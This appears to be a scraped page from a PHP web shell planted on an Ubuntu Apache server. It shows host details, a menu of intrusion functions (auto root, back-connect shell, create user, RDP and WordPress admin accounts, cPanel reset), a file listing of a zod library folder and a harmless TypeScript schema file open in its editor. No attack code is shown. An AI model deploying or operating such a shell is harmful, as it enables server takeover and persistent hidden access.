Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
zod /
v4 /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
api.cjs
25.84
KB
-rw-r--r--
api.d.cts
28.75
KB
-rw-r--r--
api.d.ts
28.75
KB
-rw-r--r--
api.js
22.44
KB
-rw-r--r--
checks.cjs
20.6
KB
-rw-r--r--
checks.d.cts
12.48
KB
-rw-r--r--
checks.d.ts
12.48
KB
-rw-r--r--
checks.js
19.09
KB
-rw-r--r--
core.cjs
2.25
KB
-rw-r--r--
core.d.cts
1.77
KB
-rw-r--r--
core.d.ts
1.77
KB
-rw-r--r--
core.js
2.04
KB
-rw-r--r--
doc.cjs
1.17
KB
-rw-r--r--
doc.d.cts
353
B
-rw-r--r--
doc.d.ts
353
B
-rw-r--r--
doc.js
1.06
KB
-rw-r--r--
errors.cjs
7.47
KB
-rw-r--r--
errors.d.cts
7.71
KB
-rw-r--r--
errors.d.ts
7.7
KB
-rw-r--r--
errors.js
6.17
KB
-rw-r--r--
function.cjs
3.92
KB
-rw-r--r--
function.d.cts
3.51
KB
-rw-r--r--
function.d.ts
3.51
KB
-rw-r--r--
function.js
2.65
KB
-rw-r--r--
index.cjs
2.11
KB
-rw-r--r--
index.d.cts
514
B
-rw-r--r--
index.d.ts
499
B
-rw-r--r--
index.js
499
B
-rw-r--r--
json-schema.cjs
77
B
-rw-r--r--
json-schema.d.cts
2.61
KB
-rw-r--r--
json-schema.d.ts
2.61
KB
-rw-r--r--
json-schema.js
11
B
-rw-r--r--
parse.cjs
3.86
KB
-rw-r--r--
parse.d.cts
1.47
KB
-rw-r--r--
parse.d.ts
1.47
KB
-rw-r--r--
parse.js
2.49
KB
-rw-r--r--
regexes.cjs
6.9
KB
-rw-r--r--
regexes.d.cts
2.7
KB
-rw-r--r--
regexes.d.ts
2.7
KB
-rw-r--r--
regexes.js
6.26
KB
-rw-r--r--
registries.cjs
1.64
KB
-rw-r--r--
registries.d.cts
1.61
KB
-rw-r--r--
registries.d.ts
1.61
KB
-rw-r--r--
registries.js
1.45
KB
-rw-r--r--
schemas.cjs
63.32
KB
-rw-r--r--
schemas.d.cts
43.65
KB
-rw-r--r--
schemas.d.ts
43.64
KB
-rw-r--r--
schemas.js
61.18
KB
-rw-r--r--
standard-schema.cjs
77
B
-rw-r--r--
standard-schema.d.cts
2.35
KB
-rw-r--r--
standard-schema.d.ts
2.35
KB
-rw-r--r--
standard-schema.js
11
B
-rw-r--r--
to-json-schema.cjs
35.07
KB
-rw-r--r--
to-json-schema.d.cts
3.64
KB
-rw-r--r--
to-json-schema.d.ts
3.64
KB
-rw-r--r--
to-json-schema.js
34.85
KB
-rw-r--r--
util.cjs
16.05
KB
-rw-r--r--
util.d.cts
10.5
KB
-rw-r--r--
util.d.ts
10.49
KB
-rw-r--r--
util.js
14.65
KB
-rw-r--r--
versions.cjs
168
B
-rw-r--r--
versions.d.cts
109
B
-rw-r--r--
versions.d.ts
109
B
-rw-r--r--
versions.js
70
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : json-schema.d.cts
export type Schema = ObjectSchema | ArraySchema | StringSchema | NumberSchema | IntegerSchema | BooleanSchema | NullSchema; export type _JSONSchema = boolean | JSONSchema; export type JSONSchema = { [k: string]: unknown; $schema?: "https://json-schema.org/draft/2020-12/schema" | "http://json-schema.org/draft-07/schema#"; $id?: string; $anchor?: string; $ref?: string; $dynamicRef?: string; $dynamicAnchor?: string; $vocabulary?: Record<string, boolean>; $comment?: string; $defs?: Record<string, JSONSchema>; type?: "object" | "array" | "string" | "number" | "boolean" | "null" | "integer"; additionalItems?: _JSONSchema; unevaluatedItems?: _JSONSchema; prefixItems?: _JSONSchema[]; items?: _JSONSchema | _JSONSchema[]; contains?: _JSONSchema; additionalProperties?: _JSONSchema; unevaluatedProperties?: _JSONSchema; properties?: Record<string, _JSONSchema>; patternProperties?: Record<string, _JSONSchema>; dependentSchemas?: Record<string, _JSONSchema>; propertyNames?: _JSONSchema; if?: _JSONSchema; then?: _JSONSchema; else?: _JSONSchema; allOf?: JSONSchema[]; anyOf?: JSONSchema[]; oneOf?: JSONSchema[]; not?: _JSONSchema; multipleOf?: number; maximum?: number; exclusiveMaximum?: number; minimum?: number; exclusiveMinimum?: number; maxLength?: number; minLength?: number; pattern?: string; maxItems?: number; minItems?: number; uniqueItems?: boolean; maxContains?: number; minContains?: number; maxProperties?: number; minProperties?: number; required?: string[]; dependentRequired?: Record<string, string[]>; enum?: Array<string | number | boolean | null>; const?: string | number | boolean | null; id?: string; title?: string; description?: string; default?: unknown; deprecated?: boolean; readOnly?: boolean; writeOnly?: boolean; examples?: unknown[]; format?: string; contentMediaType?: string; contentEncoding?: string; contentSchema?: JSONSchema; _prefault?: unknown; }; export type BaseSchema = JSONSchema; export interface ObjectSchema extends JSONSchema { type: "object"; } export interface ArraySchema extends JSONSchema { type: "array"; } export interface StringSchema extends JSONSchema { type: "string"; } export interface NumberSchema extends JSONSchema { type: "number"; } export interface IntegerSchema extends JSONSchema { type: "integer"; } export interface BooleanSchema extends JSONSchema { type: "boolean"; } export interface NullSchema extends JSONSchema { type: "null"; }
Close